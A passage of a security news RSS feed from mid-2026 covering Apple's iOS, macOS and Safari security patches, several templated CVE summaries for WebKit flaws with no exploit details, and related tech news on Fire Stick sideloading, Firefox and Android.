<title><![CDATA[Apple Patches Dozens of Vulnerabilities Across iOS, macOS, and Safari]]></title>
<description><![CDATA[The updates fix vulnerabilities in WebKit, the kernel, WebRTC, Web Extensions, and other components affecting iPhone, iPad, Mac, and Safari users. The post Apple Patches Dozens of Vulnerabilities Across iOS, macOS, and Safari appeared first on SecurityWeek. This article has…
Read more →
The post ...]]></description>
<link>https://tsecurity.de/de/3637990/it-security-nachrichten/apple-patches-dozens-of-vulnerabilities-across-ios-macos-and-safari/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3637990/it-security-nachrichten/apple-patches-dozens-of-vulnerabilities-across-ios-macos-and-safari/</guid>
<pubDate>Wed, 01 Jul 2026 11:37:48 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>The updates fix vulnerabilities in WebKit, the kernel, WebRTC, Web Extensions, and other components affecting iPhone, iPad, Mac, and Safari users. The post Apple Patches Dozens of Vulnerabilities Across iOS, macOS, and Safari appeared first on SecurityWeek. This article has…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/apple-patches-dozens-of-vulnerabilities-across-ios-macos-and-safari/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/apple-patches-dozens-of-vulnerabilities-across-ios-macos-and-safari/">Apple Patches Dozens of Vulnerabilities Across iOS, macOS, and Safari</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-20608 | Apple Safari/macOS/visionOS/iOS/iPadOS up to 26.2 Web state issue (Nessus ID 303253)]]></title>
<description><![CDATA[A vulnerability classified as problematic was found in Apple Safari, macOS, visionOS, iOS and iPadOS up to 26.2. This affects an unknown part of the component Web Handler. Executing a manipulation can lead to state issue.

This vulnerability appears as CVE-2026-20608. The attack may be performed ...]]></description>
<link>https://tsecurity.de/de/3637168/sicherheitsluecken/cve-2026-20608-apple-safarimacosvisionosiosipados-up-to-262-web-state-issue-nessus-id-303253/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3637168/sicherheitsluecken/cve-2026-20608-apple-safarimacosvisionosiosipados-up-to-262-web-state-issue-nessus-id-303253/</guid>
<pubDate>Wed, 01 Jul 2026 03:08:20 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability classified as <a href="https://vuldb.com/kb/risk">problematic</a> was found in <a href="https://vuldb.com/product/apple:safari">Apple Safari, macOS, visionOS, iOS and iPadOS up to 26.2</a>. This affects an unknown part of the component <em>Web Handler</em>. Executing a manipulation can lead to state issue.

This vulnerability appears as <a href="https://vuldb.com/cve/CVE-2026-20608">CVE-2026-20608</a>. The attack may be performed from remote. There is no available exploit.

Upgrading the affected component is advised.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-20636 | Apple Safari/macOS/visionOS/iOS/iPadOS up to 26.2 Web memory corruption (Nessus ID 303253)]]></title>
<description><![CDATA[A vulnerability has been found in Apple Safari, macOS, visionOS, iOS and iPadOS up to 26.2 and classified as critical. Impacted is an unknown function of the component Web Handler. This manipulation causes memory corruption.

This vulnerability is handled as CVE-2026-20636. The attack can be init...]]></description>
<link>https://tsecurity.de/de/3637166/sicherheitsluecken/cve-2026-20636-apple-safarimacosvisionosiosipados-up-to-262-web-memory-corruption-nessus-id-303253/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3637166/sicherheitsluecken/cve-2026-20636-apple-safarimacosvisionosiosipados-up-to-262-web-memory-corruption-nessus-id-303253/</guid>
<pubDate>Wed, 01 Jul 2026 03:08:17 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability has been found in <a href="https://vuldb.com/product/apple:safari">Apple Safari, macOS, visionOS, iOS and iPadOS up to 26.2</a> and classified as <a href="https://vuldb.com/kb/risk">critical</a>. Impacted is an unknown function of the component <em>Web Handler</em>. This manipulation causes memory corruption.

This vulnerability is handled as <a href="https://vuldb.com/cve/CVE-2026-20636">CVE-2026-20636</a>. The attack can be initiated remotely. There is not any exploit available.

The affected component should be upgraded.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-20635 | Apple Safari/macOS/watchOS/visionOS/iOS/iPadOS/tvOS up to 26.2 Web memory corruption (Nessus ID 303253)]]></title>
<description><![CDATA[A vulnerability, which was classified as critical, was found in Apple Safari, macOS, watchOS, visionOS, iOS, iPadOS and tvOS up to 26.2. This issue affects some unknown processing of the component Web Handler. The manipulation results in memory corruption.

This vulnerability is known as CVE-2026...]]></description>
<link>https://tsecurity.de/de/3637165/sicherheitsluecken/cve-2026-20635-apple-safarimacoswatchosvisionosiosipadostvos-up-to-262-web-memory-corruption-nessus-id-303253/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3637165/sicherheitsluecken/cve-2026-20635-apple-safarimacoswatchosvisionosiosipadostvos-up-to-262-web-memory-corruption-nessus-id-303253/</guid>
<pubDate>Wed, 01 Jul 2026 03:08:16 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability, which was classified as <a href="https://vuldb.com/kb/risk">critical</a>, was found in <a href="https://vuldb.com/product/apple:safari">Apple Safari, macOS, watchOS, visionOS, iOS, iPadOS and tvOS up to 26.2</a>. This issue affects some unknown processing of the component <em>Web Handler</em>. The manipulation results in memory corruption.

This vulnerability is known as <a href="https://vuldb.com/cve/CVE-2026-20635">CVE-2026-20635</a>. It is possible to launch the attack remotely. No exploit is available.

You should upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-20644 | Apple Safari/macOS/visionOS/iOS/iPadOS up to 26.2 Web memory corruption (Nessus ID 303253)]]></title>
<description><![CDATA[A vulnerability was found in Apple Safari, macOS, visionOS, iOS and iPadOS up to 26.2 and classified as critical. The affected element is an unknown function of the component Web Handler. Such manipulation leads to memory corruption.

This vulnerability is uniquely identified as CVE-2026-20644. T...]]></description>
<link>https://tsecurity.de/de/3637164/sicherheitsluecken/cve-2026-20644-apple-safarimacosvisionosiosipados-up-to-262-web-memory-corruption-nessus-id-303253/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3637164/sicherheitsluecken/cve-2026-20644-apple-safarimacosvisionosiosipados-up-to-262-web-memory-corruption-nessus-id-303253/</guid>
<pubDate>Wed, 01 Jul 2026 03:08:14 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/apple:safari">Apple Safari, macOS, visionOS, iOS and iPadOS up to 26.2</a> and classified as <a href="https://vuldb.com/kb/risk">critical</a>. The affected element is an unknown function of the component <em>Web Handler</em>. Such manipulation leads to memory corruption.

This vulnerability is uniquely identified as <a href="https://vuldb.com/cve/CVE-2026-20644">CVE-2026-20644</a>. The attack can be launched remotely. No exploit exists.

It is suggested to upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[Amazon Blames Piracy Apps With Malware For Killing New Fire Stick Sideloading]]></title>
<description><![CDATA[Amazon says it is ending sideloading on new Fire Sticks because "apps that facilitate piracy, and other apps, can carry malware," adding that there is "a good amount of evidence" that sideloaded apps may contain unwanted code or behavior. However, the company did not provide specific examples of ...]]></description>
<link>https://tsecurity.de/de/3637046/it-security-nachrichten/amazon-blames-piracy-apps-with-malware-for-killing-new-fire-stick-sideloading/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3637046/it-security-nachrichten/amazon-blames-piracy-apps-with-malware-for-killing-new-fire-stick-sideloading/</guid>
<pubDate>Wed, 01 Jul 2026 01:08:25 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Amazon says it is ending sideloading on new Fire Sticks because "apps that facilitate piracy, and other apps, can carry malware," adding that there is "a good amount of evidence" that sideloaded apps may contain unwanted code or behavior. However, the company did not provide specific examples of Fire Stick users being harmed. Ars Technica reports: Amazon has released two Fire Stick models that use its proprietary, Linux-based operating system, Vega OS. Previous Fire Sticks ran Fire OS, which is an Android fork based on the Android Open Source Project. One of the biggest differences between Vega OS and Fire OS is that the former doesn't support sideloading. [...] In a recent interview, Or Goren, editor-in-chief of Cord Busters, a UK-based streaming news outlet, noted the negative reaction to Vega being a closed OS. [Aidan Marcuss, VP of Fire TV, advertising, and Appstore] responded, per the publication, by saying that Vega OS was Amazon's opportunity to "innovate and deliver more capabilities, even on the least expensive devices."
 
He also said that making a platform around security and privacy was "sort of utmost in my mind." The statement is somewhat ironic, considering Vega OS blocks custom launchers and other third-party apps that helped users avoid Amazon tracking and ads. Goren asked whether Amazon had evidence that sideloaded devices caused users harm. "Apps that facilitate piracy, and other apps, can carry malware," Marcuss responded. Marcuss also said that there is "a good amount of evidence that apps can carry unwanted code and behavior on them when they're sideloaded."
 
Marcuss didn't provide specific examples of Fire Stick users being hurt by sideloaded apps. There are some potential examples, though. In 2025, Amazon claimed to blacklist (which blocked the apps from being sideloaded to Fire Sticks) four video streaming apps for malicious behavior. At the time, AFTVnews reported that two of the apps served as residential proxy providers and were considered riskware, and that the other two had APK files that were flagged by virus-scanning tools. Safari and Chrome also flagged one of the apps' official websites, the publication reported. And in 2018, a botnet that infected Android devices with cryptocurrency-mining malware appeared on some Fire Sticks, per discussion on XDA Forums. That said, Amazon also has a history of disabling apps that let users circumnavigate its home screen that Fire devices, including Fire Sticks and Fire TVs, have increasingly used for ads. Worth noting: developers can continue sideloading apps onto Vega OS devices if they register them with Amazon.<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=Amazon+Blames+Piracy+Apps+With+Malware+For+Killing+New+Fire+Stick+Sideloading%3A+https%3A%2F%2Fyro.slashdot.org%2Fstory%2F26%2F06%2F30%2F2149243%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Fyro.slashdot.org%2Fstory%2F26%2F06%2F30%2F2149243%2Famazon-blames-piracy-apps-with-malware-for-killing-new-fire-stick-sideloading%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://yro.slashdot.org/story/26/06/30/2149243/amazon-blames-piracy-apps-with-malware-for-killing-new-fire-stick-sideloading?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Apple schließt mit iOS 26.5.2 und iPadOS 26.5.2 über 30 Sicherheitslücken]]></title>
<description><![CDATA[KUPERTINO / LONDON (IT BOLTWISE) – Apple veröffentlicht iOS 26.5.2 und iPadOS 26.5.2 mit Security-Fixes für mehr als 30 Schwachstellen. Der Patch adressiert unter anderem Kernel-Probleme, WebKit-Bausteine in Safari sowie mehrere Komponenten rund um WebRTC und Web Storage. Besonders relevant ist, ...]]></description>
<link>https://tsecurity.de/de/3636823/it-security-nachrichten/apple-schliesst-mit-ios-2652-und-ipados-2652-ueber-30-sicherheitsluecken/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3636823/it-security-nachrichten/apple-schliesst-mit-ios-2652-und-ipados-2652-ueber-30-sicherheitsluecken/</guid>
<pubDate>Tue, 30 Jun 2026 22:38:50 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1024" height="1024" src="https://www.it-boltwise.de/wp-content/uploads/2026/06/ai-apple-ios-ipados-security-update-kernel-webkit.jpg" class="attachment- size- wp-post-image" alt="" decoding="async" fetchpriority="high" srcset="https://www.it-boltwise.de/wp-content/uploads/2026/06/ai-apple-ios-ipados-security-update-kernel-webkit.jpg 1024w, https://www.it-boltwise.de/wp-content/uploads/2026/06/ai-apple-ios-ipados-security-update-kernel-webkit-300x300.jpg 300w, https://www.it-boltwise.de/wp-content/uploads/2026/06/ai-apple-ios-ipados-security-update-kernel-webkit-150x150.jpg 150w, https://www.it-boltwise.de/wp-content/uploads/2026/06/ai-apple-ios-ipados-security-update-kernel-webkit-768x768.jpg 768w, https://www.it-boltwise.de/wp-content/uploads/2026/06/ai-apple-ios-ipados-security-update-kernel-webkit-840x840.jpg 840w, https://www.it-boltwise.de/wp-content/uploads/2026/06/ai-apple-ios-ipados-security-update-kernel-webkit-120x120.jpg 120w" sizes="(max-width: 1024px) 100vw, 1024px">KUPERTINO / LONDON (IT BOLTWISE) – Apple veröffentlicht iOS 26.5.2 und iPadOS 26.5.2 mit Security-Fixes für mehr als 30 Schwachstellen. Der Patch adressiert unter anderem Kernel-Probleme, WebKit-Bausteine in Safari sowie mehrere Komponenten rund um WebRTC und Web Storage. Besonders relevant ist, dass einige Fixes bereits aus iOS 26.6 und iPadOS 26.6 Beta-Releases vorweggenommen waren. Damit […]</p>
<div><a href="https://www.it-boltwise.de/apple-schliesst-mit-ios-26-5-2-und-ipados-26-5-2-ueber-30-sicherheitsluecken.html">... den vollständigen Artikel <strong>»Apple schließt mit iOS 26.5.2 und iPadOS 26.5.2 über 30 Sicherheitslücken«</strong> lesen</a></div>
<p>Dieser Beitrag <a href="https://www.it-boltwise.de/apple-schliesst-mit-ios-26-5-2-und-ipados-26-5-2-ueber-30-sicherheitsluecken.html">Apple schließt mit iOS 26.5.2 und iPadOS 26.5.2 über 30 Sicherheitslücken</a> erschien als erstes auf <a href="https://www.it-boltwise.de/">IT BOLTWISE x Artificial Intelligence</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Nothing Phone 3: Hotfix-Update behebt nervigen Fehler]]></title>
<description><![CDATA[Nachdem das Nothing Phone 3 vor knapp zwei Wochen das Juni Firmware-Update erhalten hat, wurden Rufe laut nach einem nervigen Fehler im Zusammenhang mit den Volumenslider, der in bestimmten Situationen …]]></description>
<link>https://tsecurity.de/de/3636745/it-nachrichten/nothing-phone-3-hotfix-update-behebt-nervigen-fehler/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3636745/it-nachrichten/nothing-phone-3-hotfix-update-behebt-nervigen-fehler/</guid>
<pubDate>Tue, 30 Jun 2026 22:02:16 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<img width="1600" height="900" src="https://i0.wp.com/www.mobiflip.de/wp-content/uploads/2025/07/nothing-phone-3-headerbild.jpg?fit=1600%2C900&amp;ssl=1" class="attachment-full size-full wp-post-image" alt="" decoding="async" fetchpriority="high" srcset="https://i0.wp.com/www.mobiflip.de/wp-content/uploads/2025/07/nothing-phone-3-headerbild.jpg?w=1600&amp;ssl=1 1600w, https://i0.wp.com/www.mobiflip.de/wp-content/uploads/2025/07/nothing-phone-3-headerbild.jpg?resize=690%2C388&amp;ssl=1 690w" sizes="(max-width: 1600px) 100vw, 1600px">
Nachdem das Nothing Phone 3 vor knapp zwei Wochen das Juni Firmware-Update erhalten hat, wurden Rufe laut nach einem nervigen Fehler im Zusammenhang mit den Volumenslider, der in bestimmten Situationen …]]></content:encoded>
</item>
<item>
<title><![CDATA[Firefox 152.0.4 veröffentlicht: Verbesserungen für Smart Window und Sicherheitsupdates]]></title>
<description><![CDATA[Mozilla hat Firefox 152.0.4 für den Release-Kanal freigegeben. Das Update bringt kleinere Verbesserungen für die Smart-Window-Funktion, behebt mehrere Fehler und schließt verschiedene Sicherheitslücken. Im Fokus stehen die Neuerungen für Smart Window. Nutzer können die Funktion jetzt auch zum Sch...]]></description>
<link>https://tsecurity.de/de/3636585/it-nachrichten/firefox-15204-veroeffentlicht-verbesserungen-fuer-smart-window-und-sicherheitsupdates/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3636585/it-nachrichten/firefox-15204-veroeffentlicht-verbesserungen-fuer-smart-window-und-sicherheitsupdates/</guid>
<pubDate>Tue, 30 Jun 2026 20:18:07 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Mozilla hat Firefox 152.0.4 für den Release-Kanal freigegeben. Das Update bringt kleinere Verbesserungen für die Smart-Window-Funktion, behebt mehrere Fehler und schließt verschiedene Sicherheitslücken. Im Fokus stehen die Neuerungen für Smart Window. Nutzer können die Funktion jetzt auch zum Schließen geöffneter...<p>Zum Beitrag: <a href="https://stadt-bremerhaven.de/firefox-152-0-4-veroeffentlicht-verbesserungen-fuer-smart-window-und-sicherheitsupdates/">Firefox 152.0.4 veröffentlicht: Verbesserungen für Smart Window und Sicherheitsupdates</a>
</p><p>
Wo du uns folgen kannst:
<a href="http://www.facebook.com/CaschysBlog">Facebook</a>, <a href="https://www.reddit.com/r/CaschysBlog/">Reddit</a>, <a href="https://news.google.com/publications/CAAqMQgKIitDQklTR2dnTWFoWUtGSE4wWVdSMExXSnlaVzFsY21oaGRtVnVMbVJsS0FBUAE?ceid=DE:de&amp;oc=3">Google News</a>, <a href="https://x.com/CaschysBlog">X</a>, <a href="https://www.threads.com/@caschysblog">Threads</a>
<br>
</p><div>
    <strong>Auf dem Laufenden bleiben?</strong>
    <br>
    <a href="https://www.google.com/preferences/source?q=stadt-bremerhaven.de">Fügt uns doch bei Google als bevorzugte Quelle hinzu!</a>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Apple schiebt iOS-, macOS- und Safari-Updates nach: KI offenbar beschleunigt WebKit-CVEs]]></title>
<description><![CDATA[CUPERTINO / LONDON (IT BOLTWISE) – Apple liefert zeitkritische Sicherheitsupdates für iOS, iPadOS, macOS und Safari aus und stopft dabei mehr als 30 Schwachstellen. Besonders relevant: Vier WebKit-Bugs wurden Berichten zufolge mit Hilfe KI-gestützter Analyse-Tools entdeckt. Apple reagiert damit a...]]></description>
<link>https://tsecurity.de/de/3636487/it-security-nachrichten/apple-schiebt-ios-macos-und-safari-updates-nach-ki-offenbar-beschleunigt-webkit-cves/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3636487/it-security-nachrichten/apple-schiebt-ios-macos-und-safari-updates-nach-ki-offenbar-beschleunigt-webkit-cves/</guid>
<pubDate>Tue, 30 Jun 2026 19:53:31 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1024" height="1024" src="https://www.it-boltwise.de/wp-content/uploads/2026/06/ai-webkit-apple-security-update.jpg" class="attachment- size- wp-post-image" alt="" decoding="async" fetchpriority="high" srcset="https://www.it-boltwise.de/wp-content/uploads/2026/06/ai-webkit-apple-security-update.jpg 1024w, https://www.it-boltwise.de/wp-content/uploads/2026/06/ai-webkit-apple-security-update-300x300.jpg 300w, https://www.it-boltwise.de/wp-content/uploads/2026/06/ai-webkit-apple-security-update-150x150.jpg 150w, https://www.it-boltwise.de/wp-content/uploads/2026/06/ai-webkit-apple-security-update-768x768.jpg 768w, https://www.it-boltwise.de/wp-content/uploads/2026/06/ai-webkit-apple-security-update-840x840.jpg 840w, https://www.it-boltwise.de/wp-content/uploads/2026/06/ai-webkit-apple-security-update-120x120.jpg 120w" sizes="(max-width: 1024px) 100vw, 1024px">CUPERTINO / LONDON (IT BOLTWISE) – Apple liefert zeitkritische Sicherheitsupdates für iOS, iPadOS, macOS und Safari aus und stopft dabei mehr als 30 Schwachstellen. Besonders relevant: Vier WebKit-Bugs wurden Berichten zufolge mit Hilfe KI-gestützter Analyse-Tools entdeckt. Apple reagiert damit auf die Sorge, dass Künstliche Intelligenz Exploits schneller vom Fund zur Ausnutzung bringt. Obwohl bislang keine […]</p>
<div><a href="https://www.it-boltwise.de/apple-schiebt-ios-macos-und-safari-updates-nach-ki-offenbar-beschleunigt-webkit-cves.html">... den vollständigen Artikel <strong>»Apple schiebt iOS-, macOS- und Safari-Updates nach: KI offenbar beschleunigt WebKit-CVEs«</strong> lesen</a></div>
<p>Dieser Beitrag <a href="https://www.it-boltwise.de/apple-schiebt-ios-macos-und-safari-updates-nach-ki-offenbar-beschleunigt-webkit-cves.html">Apple schiebt iOS-, macOS- und Safari-Updates nach: KI offenbar beschleunigt WebKit-CVEs</a> erschien als erstes auf <a href="https://www.it-boltwise.de/">IT BOLTWISE x Artificial Intelligence</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Apple Releases iOS 26.5.2 Early to Stop New AI Hacking Tools]]></title>
<description><![CDATA[Apple just rolled out a new software update for its devices a lot sooner than anyone expected. The company officially released iOS 26.5.2 to the public today to fix several major security issues. Instead of waiting for the next big software cycle, Apple pushed these fixes out early because of gro...]]></description>
<link>https://tsecurity.de/de/3636249/ios-mac-os/apple-releases-ios-2652-early-to-stop-new-ai-hacking-tools/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3636249/ios-mac-os/apple-releases-ios-2652-early-to-stop-new-ai-hacking-tools/</guid>
<pubDate>Tue, 30 Jun 2026 18:26:16 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Apple just rolled out a new software update for its devices a lot sooner than anyone expected. The company officially released iOS 26.5.2 to the public today to fix several major security issues. Instead of waiting for the next big software cycle, Apple pushed these fixes out early because of growing concerns about artificial intelligence helping bad actors create new hacking tools much faster.



The update patches over two dozen security flaws right now



This patch includes more than 25 specific security fixes for your phone. A large number of these fixes deal directly with WebKit, which is the engine that powers the Safari web browser. Flaws in web browsers are especially important to fix quickly because they affect almost everyone who uses the internet.



In the past, Apple usually waited to bundle these types of patches into major future releases. In fact, many of these fixes were already being tested by software developers using the iOS 26.6 beta 3 version. But times have changed. The company told reporters that AI makes it too easy for attackers to find and use these vulnerabilities quickly. Because of that risk, its engineering team decided it needed to shrink the waiting period between finding a problem and sending the fix to your device.



The company is also updating tablets and computers today



The technology giant did not just focus on phones. It also released identical security protections for other devices in its lineup. For tablet owners, the security protections originally found in the iPadOS 26.6 beta 3 test version are available to download right now.



Computer users get the exact same treatment. The specific bug fixes originally seen in the macOS Tahoe 26.6 beta 3 build are now public inside the macOS 26.5.2 update. If you use any of these devices, you should head into your system settings and download the new software as soon as possible.



The company has not seen evidence that anyone is actively using these flaws to attack users yet, but updating early is the best way to stay safe online.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-43707 | Apple Safari/iOS/iPadOS/macOS up to 26.5.1 Web denial of service (Nessus ID 323673)]]></title>
<description><![CDATA[A vulnerability classified as problematic was found in Apple Safari, iOS, iPadOS and macOS up to 26.5.1. This impacts an unknown function of the component Web Handler. The manipulation results in denial of service.

This vulnerability is cataloged as CVE-2026-43707. The attack may be launched rem...]]></description>
<link>https://tsecurity.de/de/3636239/sicherheitsluecken/cve-2026-43707-apple-safariiosipadosmacos-up-to-2651-web-denial-of-service-nessus-id-323673/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3636239/sicherheitsluecken/cve-2026-43707-apple-safariiosipadosmacos-up-to-2651-web-denial-of-service-nessus-id-323673/</guid>
<pubDate>Tue, 30 Jun 2026 18:25:43 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability classified as <a href="https://vuldb.com/kb/risk">problematic</a> was found in <a href="https://vuldb.com/product/apple:safari">Apple Safari, iOS, iPadOS and macOS up to 26.5.1</a>. This impacts an unknown function of the component <em>Web Handler</em>. The manipulation results in denial of service.

This vulnerability is cataloged as <a href="https://vuldb.com/cve/CVE-2026-43707">CVE-2026-43707</a>. The attack may be launched remotely. There is no exploit available.

Upgrading the affected component is advised.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-43708 | Apple Safari/iOS/iPadOS/macOS up to 26.5.1 Website cross-domain policy (Nessus ID 323673)]]></title>
<description><![CDATA[A vulnerability, which was classified as problematic, has been found in Apple Safari, iOS, iPadOS and macOS up to 26.5.1. Affected is an unknown function of the component Website Handler. This manipulation causes permissive cross-domain policy with untrusted domains.

This vulnerability is regist...]]></description>
<link>https://tsecurity.de/de/3636238/sicherheitsluecken/cve-2026-43708-apple-safariiosipadosmacos-up-to-2651-website-cross-domain-policy-nessus-id-323673/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3636238/sicherheitsluecken/cve-2026-43708-apple-safariiosipadosmacos-up-to-2651-website-cross-domain-policy-nessus-id-323673/</guid>
<pubDate>Tue, 30 Jun 2026 18:25:42 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability, which was classified as <a href="https://vuldb.com/kb/risk">problematic</a>, has been found in <a href="https://vuldb.com/product/apple:safari">Apple Safari, iOS, iPadOS and macOS up to 26.5.1</a>. Affected is an unknown function of the component <em>Website Handler</em>. This manipulation causes permissive cross-domain policy with untrusted domains.

This vulnerability is registered as <a href="https://vuldb.com/cve/CVE-2026-43708">CVE-2026-43708</a>. Remote exploitation of the attack is possible. No exploit is available.

It is advisable to upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-43709 | Apple Safari/iOS/iPadOS/macOS up to 26.5.1 Web use after free (Nessus ID 323673)]]></title>
<description><![CDATA[A vulnerability, which was classified as critical, was found in Apple Safari, iOS, iPadOS and macOS up to 26.5.1. Affected by this vulnerability is an unknown functionality of the component Web Handler. Such manipulation leads to use after free.

This vulnerability is documented as CVE-2026-43709...]]></description>
<link>https://tsecurity.de/de/3636237/sicherheitsluecken/cve-2026-43709-apple-safariiosipadosmacos-up-to-2651-web-use-after-free-nessus-id-323673/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3636237/sicherheitsluecken/cve-2026-43709-apple-safariiosipadosmacos-up-to-2651-web-use-after-free-nessus-id-323673/</guid>
<pubDate>Tue, 30 Jun 2026 18:25:40 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability, which was classified as <a href="https://vuldb.com/kb/risk">critical</a>, was found in <a href="https://vuldb.com/product/apple:safari">Apple Safari, iOS, iPadOS and macOS up to 26.5.1</a>. Affected by this vulnerability is an unknown functionality of the component <em>Web Handler</em>. Such manipulation leads to use after free.

This vulnerability is documented as <a href="https://vuldb.com/cve/CVE-2026-43709">CVE-2026-43709</a>. The attack can be executed remotely. There is not any exploit available.

You should upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-43712 | Apple Safari/iOS/iPadOS/macOS up to 26.5.1 Web denial of service (Nessus ID 323673)]]></title>
<description><![CDATA[A vulnerability has been found in Apple Safari, iOS, iPadOS and macOS up to 26.5.1 and classified as problematic. Affected by this issue is some unknown functionality of the component Web Handler. Performing a manipulation results in denial of service.

This vulnerability is reported as CVE-2026-...]]></description>
<link>https://tsecurity.de/de/3636236/sicherheitsluecken/cve-2026-43712-apple-safariiosipadosmacos-up-to-2651-web-denial-of-service-nessus-id-323673/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3636236/sicherheitsluecken/cve-2026-43712-apple-safariiosipadosmacos-up-to-2651-web-denial-of-service-nessus-id-323673/</guid>
<pubDate>Tue, 30 Jun 2026 18:25:39 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability has been found in <a href="https://vuldb.com/product/apple:safari">Apple Safari, iOS, iPadOS and macOS up to 26.5.1</a> and classified as <a href="https://vuldb.com/kb/risk">problematic</a>. Affected by this issue is some unknown functionality of the component <em>Web Handler</em>. Performing a manipulation results in denial of service.

This vulnerability is reported as <a href="https://vuldb.com/cve/CVE-2026-43712">CVE-2026-43712</a>. The attack is possible to be carried out remotely. No exploit exists.

The affected component should be upgraded.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-43735 | Apple Safari/iOS/iPadOS/macOS up to 26.5.1 Website cross-domain policy (EUVD-2026-40186)]]></title>
<description><![CDATA[A vulnerability marked as problematic has been reported in Apple Safari, iOS, iPadOS and macOS up to 26.5.1. Affected by this issue is some unknown functionality of the component Website Handler. This manipulation causes permissive cross-domain policy with untrusted domains.

The identification o...]]></description>
<link>https://tsecurity.de/de/3636229/sicherheitsluecken/cve-2026-43735-apple-safariiosipadosmacos-up-to-2651-website-cross-domain-policy-euvd-2026-40186/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3636229/sicherheitsluecken/cve-2026-43735-apple-safariiosipadosmacos-up-to-2651-website-cross-domain-policy-euvd-2026-40186/</guid>
<pubDate>Tue, 30 Jun 2026 18:25:30 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability marked as <a href="https://vuldb.com/kb/risk">problematic</a> has been reported in <a href="https://vuldb.com/product/apple:safari">Apple Safari, iOS, iPadOS and macOS up to 26.5.1</a>. Affected by this issue is some unknown functionality of the component <em>Website Handler</em>. This manipulation causes permissive cross-domain policy with untrusted domains.

The identification of this vulnerability is <a href="https://vuldb.com/cve/CVE-2026-43735">CVE-2026-43735</a>. It is possible to initiate the attack remotely. There is no exploit available.

It is suggested to upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[Android Auto: Dieser Fehler stört Fahrer schon lange – jetzt kommt die Lösung]]></title>
